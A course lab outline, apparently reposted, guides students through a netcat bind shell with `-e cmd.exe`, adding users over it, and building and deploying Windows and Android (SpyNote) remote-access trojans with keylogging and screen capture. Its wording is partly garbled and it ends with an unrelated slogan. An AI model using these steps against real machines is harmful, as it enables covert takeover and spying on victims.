
; 201521460024
中国人民大学
中国人民大学
网络对抗技术
实验报告
实验4
恶意代码技术
学生姓名
崔承龙
成绩
2015年级
区队
六个地区
老师
高视力
信息技术与网络安全学院
2016年11月7日
实验任务大纲
2016-2017学年的第一学期

首先,实验目的
1. 通过木马的实践,读者可以了解和掌握木马传播和运行的机制. 通过手动删除木马,掌握检查木马和删除木马的技巧,学习有关防御木马的相关知识,并加深对木马安全性的认识.
2. 了解并熟悉常用的网络攻击工具,木马的基本功能;
3. 以达到巩固课程知识和实际应用的目的.
第二,实验要求
1. 仔细阅读每个实验的内容,需要屏幕截图的主题,清除屏幕截图以及标记并解释屏幕截图.
2. 该文档需要清晰的结构,准确的图形表示和标准规格. 推理的内容是客观,合理,合乎逻辑的.
3. 可以使用NC和MSF等软件工具.
4. 实验结束后,保留电子文件.
三个实验步骤
1. 准备
事先为实验做准备. 实验前,应详细了解实验目的,实验要求和实验内容,熟悉并准备实验软件工具,并根据实验内容和要求预先准备实验内容.
2. 实验环境
描述实验中使用的硬件和软件环境(包括各种软件工具);
启动并启动软件office2003或2007,浏览器,加密和解密软件.
3. 实验过程
1)启动系统并启动工具软件环境.
2)使用软件工具实现实验内容.
4. 实验报告

按照统一要求的实验报告格式编写实验报告. 将以模板格式编写的文档嵌入到实验报告文档中. 该文件以规定的书写格式书写. 桌子必须有桌子,图形必须有图片.
任务1使用NC控制计算机
NetCat,被称为网络,结构紧凑且功能强大. 据说它紧凑而强大,因为它的软件大小现在压缩到只有十几KB,并且功能没有减少.
实验过程需要两名学生相互合作才能完成:
第一步:
在受害者的计算机(同学A)上输入以下命令: nc.exe -l -p port -e cmd.exe进入模式

第2步: 在攻击者的计算机上. (学生B)输入以下命令: nc ipport //连接受害者IP,并获得一个外壳. (需要截图)

第三步:
在外壳程序中,使用net user用户名和密码/ add添加用户,然后使用net user命令在受害者的计算机上进行验证. (需要截图)

您可以继续通过命令行执行某些操作.
任务2使用木马程序控制计算机
相关工具:
实验过程需要两个学生的合作:
第一步:
攻击者的机器. (学生A)打开V2014.exe程序或star RAT,这两个木马具有相似的功能.


步骤2: 在菜单栏中单击“生成服务”,在弹出的配置服务器中,配置连接的IP地址(攻击者IP)和端口号,然后单击“生成”按钮生成木马服务器.

第三步:
将生成的Trojan可执行程序复制到受害者的计算机上,然后双击运行.

第四步:
在控制台上检查Trojan的状态,并测试并截取以下每个功能的屏幕截图.

文件管理,尝试复制文件

屏幕控制,尝试获取桌面键盘记录,尝试获取另一方的按键记录

会话管理,重新启动对方的计算机,然后查看它是否可以自动启动
会话管理,卸载另一方的木马.
任务三: Android练习将所有过程的屏幕截图发送到博客
下载相关工具:
spynote和环境工具:
android模拟器:
或

实验步骤:
首先,攻击者打开spynote软件,该软件需要首先安装.netframework4.0和jdk环境.

第二,配置并打开端口
单击“侦听端口”,在弹出的对话框中输入端口号,单击“添加”按钮,最后单击“确定”以成功监视本地端口. [在此过程中使用了3210端口,您可以在实验期间自行选择端口]

三,配置并生成木马
(1)单击Build Client按钮,弹出一个对话框

(2)配置连接IP和端口,填写运行spynote的计算机的IP地址,填写用于的端口号,然后填写端口3210.

(3)配置相关的属性信息.

(4)最后,单击“生成”按钮,并在选择框中与spynote相同的文件夹中选择Patch-release.apk.

(5)完成后,自动打开生成APK的文件夹.
四,在Android仿真中安装该木马.

五,在Spynote中控制手机
您可以在spynote中看到一台正在运行的计算机,并且可以查看其基本信息.

右键单击计算机恶意代码,可以看到可以控制计算机的功能恶意代码,并选择4个以上的项目进行实验.
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/jisuanjixue/article-263499-1.html
欢迎美国军舰南海一日游